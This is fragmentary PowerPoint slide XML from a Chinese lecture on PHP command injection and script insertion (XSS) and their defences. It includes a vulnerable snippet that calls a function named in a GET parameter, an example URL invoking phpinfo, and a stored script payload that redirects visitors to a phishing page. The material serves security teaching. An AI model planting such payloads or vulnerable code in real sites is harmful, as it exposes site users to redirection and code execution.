          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> function A(){…}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> function B(){…}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>($_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"]))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>myfunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = $_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>        echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>myfunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> http://www.xxx.com/ex.php?func=phpinfo</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令注入的防范</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尽量不要执行外部命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用自定义函数或函数库来替代外部命令的功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数来处理命令参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>esacpeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数会将任何引起参数或命令结束的字符转义（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\' \" \;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>safe_mode_exec_dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定可执行文件的路径，可以把会使用的命令提前放入此路径内，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>safe_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>safe_mode_exec_di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> r= /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>usr/local/php/bin</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端脚本植入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端脚本植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(Script Insertion)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后，攻击者所植入的脚本就会被执行，进而开始攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可作为脚本植入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签内指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序代码，或者在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>属性内指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;object&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签标记的对象，这些对象是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>java applet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、多媒体文件和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>控件等，通常在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>属性内指定对象的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;embed&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签标记的对象，这些对象是多媒体文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>），在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>属性内指定对象的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;form&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签标记的对象。通常在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>属性内指定要处理表单数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端脚本植入的攻击步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 3" descr="20120416124436730.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251750" y="1657344"/>
            <a:ext cx="9449593" cy="4955060"/>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端脚本植入的案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>创建数据表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>create table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> not null primary key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>auto_increment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	title </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(30) not null,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(200) not null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)engine=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>myisam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=utf8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="http://www.xx.com";&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跳转钓鱼页面</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端脚本植入的防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数来将特殊字符转换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> (string string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>quote_style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
